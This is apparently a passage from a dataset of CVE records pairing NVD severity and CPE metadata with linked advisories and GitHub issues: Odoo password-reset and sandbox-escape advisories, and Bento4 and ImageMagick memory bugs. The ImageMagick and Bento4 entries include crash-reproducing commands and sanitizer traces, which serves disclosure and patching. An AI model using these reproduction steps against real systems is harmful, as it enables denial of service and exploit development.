https://www.odoo.com/documentation/11.0/setup/update.html
If you choose to apply the patch instead, change into the main directory of
your Odoo installation (the one containing "odoo" and "addons" directories),
then execute the patch command, typically:
patch -p0 -f < /path/to/the_patch_file.patch
This command assumes your installation layout corresponds to
the latest source code layout of the Odoo project on GitHub.
If your installation differs, please extract the various patch
hunks from the files and apply them in the appropriate locations.
## VI. Correction details
The following list contains the revisions after which the vulnerability
is corrected:
- 9.0: d5efba256138464618a7bfa8f52beb3eaae50509
- 10.0: dae282279947e1f9cccad5ec0244ee654132509b
- 11.0: d255628ecf564d54825a55c662eeee552e66377a
- 11.0-ent, 10.0-ent and 9.0-ent (Enterprise): see 11.0, 10.0 and 9.0.
| [SEC] ODOO-SA-2018-08-07-1 (CVE-2018-14865) - Report engine in Odoo Community... | https://api.github.com/repos/odoo/odoo/issues/32501/comments | 0 | 2019-04-08T13:37:23Z | 2019-04-08T13:37:25Z | https://github.com/odoo/odoo/issues/32501 | 430,456,471 | 32,501 |
CVE-2018-14859 | 2019-07-03T20:15:10.777 | Incorrect access control in the password reset component in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows authenticated users to reset the password of other users by being the first party to use the secure token. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.2,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/odoo/odoo/issues/32510"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:community:*:*:*",
"matchCriteriaId": "C3F9E8F1-FAF7-44AE-8D05-BE717D247EDE",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:9.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "167C709E-C8B2-4CCB-963E-E1D8C664190A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:community:*:*:*",
"matchCriteriaId": "C52F2EEB-11E5-49E8-AD06-3014FF2C2D24",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:10.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "A4405E54-6C16-49D5-B632-3D72091B2FEB",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:community:*:*:*",
"matchCriteriaId": "38424B03-4121-4A79-8E4E-4CB4DCD3E4A5",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:11.0:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "1298CF62-A06E-48AD-8141-0541DE3F6381",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/odoo/odoo/issues/32510 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - ODOO-SA-2018-08-07-10
Incorrect access control in the password reset component in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows authenticated users to reset the password of other users by being the first party to use the secure token.
**Affects**: Odoo 9.0, 10.0, 11.0 (Community and Enterprise Editions)
**Component**: Odoo Framework
**Credits**: Swapnesh Shah, Nils Hamerlinck (Trobz)
**CVE ID**: [CVE-2018-14859](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14859)
## I. Background
The "External Signup" module (auth_signup) allows external users to create
accounts on databases where the feature is installed and enabled. It also
provides a password reset feature, so that users can recover their accounts
by clicking on a secure link received by email.
## II. Problem Description
A secret field used to contruct the secure reset password link was not properly
protected againt access by internal users of the systems.
## III. Impact
Access Vector: Network exploitable
Access Complexity: Low
**Authentication**: "Employee" access required
**CVSS3 Score**: High :: 8.1
**CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)
A malicious internal user (a regular "Employee" account) could trigger a reset
password for a user, and use the value of the secret field to change the password
of other users before they could react to the email. This would work even when
targetting administrator accounts.
The victim would likely notice both a suspicious reset password message and
the fact that they would now be unable to sign in with their usual password,
but possibly not before the attacker was able to abuse the credentials of the
user.
Odoo S.A. is not aware of any malicious use of this vulnerability.
## IV. Workaround
An administrator may disable the reset password feature to prevent the attack.
As the reset password is a convenient feature exepcted by users registering
on a system, applying the patch or updating is strongly recommended.
Odoo Online servers have been patched as soon as the correction was available.
## V. Solution
Apply the patches corresponding to your Odoo installation, or update to
the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
For the actual update procedure, please refer to our update instructions, valid
for all versions:
https://www.odoo.com/documentation/11.0/setup/update.html
If you choose to apply the patch instead, change into the main directory of
your Odoo installation (the one containing "odoo" and "addons" directories),
then execute the patch command, typically:
patch -p0 -f < /path/to/the_patch_file.patch
This command assumes your installation layout corresponds to
the latest source code layout of the Odoo project on GitHub.
If your installation differs, please extract the various patch
hunks from the files and apply them in the appropriate locations.
## VI. Correction details
The following list contains the revisions after which the vulnerability
is corrected:
- 9.0: 57ea939edac7ae4fa19306bf827231027f3c245c
- 10.0: 7501691da9a9dae832b7d6e78c6a5f57fc983b5c
- 11.0: cbce12642570e6b65d7b21738712c189f6cdee5d
- 11.0-ent, 10.0-ent and 9.0 (Enterprise): see 11.0, 10.0 and 9.0.
| [SEC] ODOO-SA-2018-08-07-10 (CVE-2018-14859) - Incorrect access control in the... | https://api.github.com/repos/odoo/odoo/issues/32510/comments | 0 | 2019-04-08T13:37:50Z | 2019-04-08T13:37:51Z | https://github.com/odoo/odoo/issues/32510 | 430,456,723 | 32,510 |
CVE-2018-14860 | 2019-07-03T20:15:10.837 | Improper sanitization of dynamic user expressions in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows authenticated privileged users to escape from the dynamic expression sandbox and execute arbitrary code on the hosting system. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "COMPLETE",
"baseScore": 9,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 10,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.3,
"impactScore": 6,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/odoo/odoo/issues/32505"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:community:*:*:*",
"matchCriteriaId": "D9126A1A-FA35-4127-91B3-A3FA8B26FABB",
"versionEndExcluding": null,
"versionEndIncluding": "11.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:odoo:odoo:*:*:*:*:enterprise:*:*:*",
"matchCriteriaId": "9ACA123F-EF25-4E9D-8D60-4368B2F25FA0",
"versionEndExcluding": null,
"versionEndIncluding": "11.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/odoo/odoo/issues/32505 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"odoo",
"odoo"
] | # Security Advisory - ODOO-SA-2018-08-07-5
Improper sanitization of dynamic user expressions in Odoo Community 11.0 and earlier and Odoo Enterprise 11.0 and earlier allows authenticated privileged users to escape from the dynamic expression sandbox and execute arbitrary code on the hosting system.
**Affects**: Odoo 11.0 and earlier (Community and Enterprise Editions)
**Component**: Odoo Framework
**Credits**: \<Undisclosed\>
**CVE ID**: [CVE-2018-14859](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14859)
## I. Background
Odoo includes a sandbox for interpreting dynamic business logic components,
such as the definition of workflows, automated actions, or the dynamic
expressions used within report templates.
The mechanism behind this sandbox is called 'safe eval' and keeps the system
safe while allowing advanced customizations. Its role is to execute
user-provided Odoo business logic, while preventing any undesired
effects on the data or the hosting platform - such as could be caused
by accident or by malicious users.
In order to be allowed to customize any of these dynamic business logic
components, one must usually be an administrator of an Odoo database,
or have otherwise received elevated privileges.
## II. Problem Description
The default 'safe eval' sandbox environment was not sufficiently sanitized,
so an attacker with sufficient privileges might be able to escape the sandbox
through the use of specially crafted dynamic expressions.
Systems who host Odoo databases for untrusted users are particularly at risk,
(e.g. SaaS platforms), as they typically allow users to become administrators
of their own Odoo database. This is sufficient to exploit the vulnerability.
## III. Impact
Access Vector: Network exploitable
Access Complexity: Medium
**Authentication**: Privileged user account required
**CVSS3 Score**: Critical :: 9.1
**CVSS3 Vector**: [CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)
Malicious users with access to an administrator account on an Odoo database
might craft special code expressions specifically targeted at escaping
the sandbox protection.
This could in turn be used to execute arbitrary code as the user running
the Odoo service, to launch system commands with access to local files and
local services.
Files and environments accessed in this manner may contain sensitive
information such as passwords that could also allow the user to gain elevated
privileges on the hosting machine itself, in addition to being able to run
commands.
Exploiting this vulnerability requires remote network access and
administrator (or privileged) account on a database hosted on a vulnerable
Odoo installation.
Odoo S.A. is not aware of any use of this vulnerability in the wild.
## IV. Workaround
No workaround is available, but systems that do not provide administrator
or otherwise privileged access to untrusted users are not vulnerable.
All Odoo Online servers have been patched as soon as the correction was
available.
## V. Solution
Apply the patches corresponding to your Odoo installation, or update to
the latest revision, either via GitHub or by downloading it:
https://www.odoo.com/page/download
For the actual update procedure, please refer to our update instructions, valid
for all versions:
https://www.odoo.com/documentation/11.0/setup/update.html
If you choose to apply the patch instead, change into the main directory of
your Odoo installation (the one containing "odoo" and "addons" directories),
then execute the patch command, typically:
patch -p0 -f < /path/to/the_patch_file.patch
This command assumes your installation layout corresponds to
the latest source code layout of the Odoo project on GitHub.
If your installation differs, please extract the various patch
hunks from the files and apply them in the appropriate locations.
## VI. Correction details
The following list contains the revisions after which the vulnerability
is corrected:
- 9.0: 779ceac97309fd69086446bc14e6d613aeb9bbdd
- 10.0: ef017ab1ab7bc5988ad30ab92a445079e245cf03
- 11.0: 21bb14d17764f16ca2727622d7892d38104e2ec3
- 11.0-ent, 10.0-ent and 9.0-ent (Enterprise): see 11.0, 10.0 and 9.0.
| [SEC] ODOO-SA-2018-08-07-5 (CVE-2018-14860) - Improper sanitization of dynami... | https://api.github.com/repos/odoo/odoo/issues/32505/comments | 0 | 2019-04-08T13:37:37Z | 2019-04-08T14:38:16Z | https://github.com/odoo/odoo/issues/32505 | 430,456,607 | 32,505 |
CVE-2019-13238 | 2019-07-04T14:15:10.853 | An issue was discovered in Bento4 1.5.1.0. A memory allocation failure is unhandled in Core/Ap4SdpAtom.cpp and leads to crashes. When parsing input video, the program allocates a new buffer to parse an atom in the stream. The unhandled memory allocation failure causes a direct copy to a NULL pointer. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
],
"cvssMetricV31": null
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/axiomatic-systems/Bento4/issues/396"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:axiosys:bento4:1.5.1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "83B32974-D913-4DDB-844F-C58D55ECC17E",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/axiomatic-systems/Bento4/issues/396 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"axiomatic-systems",
"Bento4"
] | A memory allocation failure unhandled in Ap4SdpAtom.cpp and leads to crashes.
`./mp42aac input_file /dev/null`
In file Source/C++/Core/Ap4SdpAtom.cpp
<img width="640" alt="image" src="https://user-images.githubusercontent.com/7632714/58334121-73c1dd80-7e71-11e9-88a2-c9fbd2129068.png">
AP4_SdpAtom allocate a new buffer to parse the atom in the stream.
The unhandled memory allocation failure cause the read content memcpy to a null pointer.
<img width="553" alt="image" src="https://user-images.githubusercontent.com/7632714/58333799-d23a8c00-7e70-11e9-9bc3-89b928919860.png">
This is the start points.
In file In file Source/C++/Core/Ap4ByteStream.cpp
![image](https://user-images.githubusercontent.com/7632714/58333856-ec746a00-7e70-11e9-9433-39bfc5eaecd1.png)
![image](https://user-images.githubusercontent.com/7632714/58333942-19288180-7e71-11e9-9483-a6682b51c009.png)
AP4_CopyMemory is the macro define of memcpy and the path formed.
Asan trace report:
> ==79431==AddressSanitizer CHECK failed: ../../../../../src/libsanitizer/sanitizer_common/sanitizer_allocator.cc:147 "((0)) != (0)" (0x0, 0x0)
#0 0xf725e797 (/usr/lib32/libasan.so.2+0x9f797)
#1 0xf7263a69 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib32/libasan.so.2+0xa4a69)
#2 0xf71d507b (/usr/lib32/libasan.so.2+0x1607b)
#3 0xf7261e80 (/usr/lib32/libasan.so.2+0xa2e80)
#4 0xf71da229 (/usr/lib32/libasan.so.2+0x1b229)
#5 0xf7256e16 in operator new[](unsigned int) (/usr/lib32/libasan.so.2+0x97e16)
#6 0x873013b in AP4_SdpAtom::AP4_SdpAtom(unsigned int, AP4_ByteStream&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4SdpAtom.cpp:60
#7 0x82dcab1 in AP4_SdpAtom::Create(unsigned int, AP4_ByteStream&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4SdpAtom.h:54
#8 0x82dcab1 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:595
#9 0x83016d3 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:221
#10 0x82b6bae in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:194
#11 0x82b6bae in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:139
#12 0x82be680 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4ContainerAtom.cpp:88
#13 0x82dc711 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:764
#14 0x82fa1f7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:221
#15 0x82fa1f7 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4AtomFactory.cpp:151
#16 0x809a044 in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4File.cpp:104
#17 0x809a044 in AP4_File::AP4_File(AP4_ByteStream&, bool) /mnt/data/playground/mp42-a/Source/C++/Core/Ap4File.cpp:78
#18 0x8082ce7 in main /mnt/data/playground/mp42-a/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250
#19 0xf69df636 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18636)
#20 0x808df1b (/mnt/data/playground/mp42-a/Build/mp42aac+0x808df1b)
[input_file.zip](https://github.com/axiomatic-systems/Bento4/files/3217304/input_file.zip)
| Exhaustive memory misunhandle | https://api.github.com/repos/axiomatic-systems/Bento4/issues/396/comments | 0 | 2019-05-24T14:17:26Z | 2019-08-25T16:31:09Z | https://github.com/axiomatic-systems/Bento4/issues/396 | 448,195,676 | 396 |
CVE-2019-13295 | 2019-07-05T01:15:09.907 | ImageMagick 7.0.8-50 Q16 has a heap-based buffer over-read at MagickCore/threshold.c in AdaptiveThresholdImage because a width of zero is mishandled. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/a7759f410b773a1dd57b0e1fb28112e1cd8b97bc"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1608"
},
{
"source": "[email protected]",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick6/commit/55e6dc49f1a381d9d511ee2f888fdc3e3c3e3953"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00021.html"
},
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://usn.ubuntu.com/4192-1/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2020/dsa-4712"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*",
"matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
"matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*",
"matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1608 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [x] I have written a descriptive issue title
- [x] I have verified that I am using the latest version of ImageMagick
- [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There's a heap-buffer-overflow at MagickCore/threshold.c:323:33 in AdaptiveThresholdImage
### Steps to Reproduce
<!-- List of steps, sample code, failing test or link to a project that reproduces the behavior.
Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues -->
run_cmd:
`magick -seed 0 "(" magick:logo +repage ")" "(" magick:wizard -lat 0x564-42% ")" -quiet tmp`
Here's ASAN log.
```
==10393==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f8ba61737f0 at pc 0x7f8bb5c0f9fa bp 0x7ffc04d5fad0 sp 0x7ffc04d5fac8
READ of size 4 at 0x7f8ba61737f0 thread T0
#0 0x7f8bb5c0f9f9 in AdaptiveThresholdImage MagickCore/threshold.c:323:33
#1 0x7f8bb51c1cb6 in CLISimpleOperatorImage MagickWand/operation.c:2571:21
#2 0x7f8bb51b6c78 in CLISimpleOperatorImages MagickWand/operation.c:3685:12
#3 0x7f8bb51dc315 in CLIOption MagickWand/operation.c:5273:16
#4 0x7f8bb501da99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#5 0x7f8bb501ed0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#6 0x7f8bb5068ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#7 0x526f95 in MagickMain utilities/magick.c:149:10
#8 0x5268e1 in main utilities/magick.c:180:10
#9 0x7f8bafadfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#10 0x41b069 in _start (install/bin/magick+0x41b069)
0x7f8ba61737f0 is located 16 bytes to the left of 4331520-byte region [0x7f8ba6173800,0x7f8ba6595000)
allocated by thread T0 here:
#0 0x4e6200 in __interceptor_posix_memalign (install/bin/magick+0x4e6200)
#1 0x7f8bb5a57ed6 in AcquireAlignedMemory MagickCore/memory.c:265:7
#2 0x7f8bb57aeccc in AcquireCacheNexusPixels MagickCore/cache.c:4968:37
#3 0x7f8bb579c13b in SetPixelCacheNexusPixels MagickCore/cache.c:5070:12
#4 0x7f8bb5793b05 in GetVirtualPixelCacheNexus MagickCore/cache.c:2751:10
#5 0x7f8bb57b1ea6 in GetCacheViewVirtualPixels MagickCore/cache-view.c:664:10
#6 0x7f8bb5c0ef20 in AdaptiveThresholdImage MagickCore/threshold.c:257:7
#7 0x7f8bb51c1cb6 in CLISimpleOperatorImage MagickWand/operation.c:2571:21
#8 0x7f8bb51b6c78 in CLISimpleOperatorImages MagickWand/operation.c:3685:12
#9 0x7f8bb51dc315 in CLIOption MagickWand/operation.c:5273:16
#10 0x7f8bb501da99 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#11 0x7f8bb501ed0a in MagickImageCommand MagickWand/magick-cli.c:796:5
#12 0x7f8bb5068ba1 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#13 0x526f95 in MagickMain utilities/magick.c:149:10
#14 0x5268e1 in main utilities/magick.c:180:10
#15 0x7f8bafadfb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/threshold.c:323:33 in AdaptiveThresholdImage
```
### System Configuration
<!-- Tell us about the environment where you are experiencing the bug -->
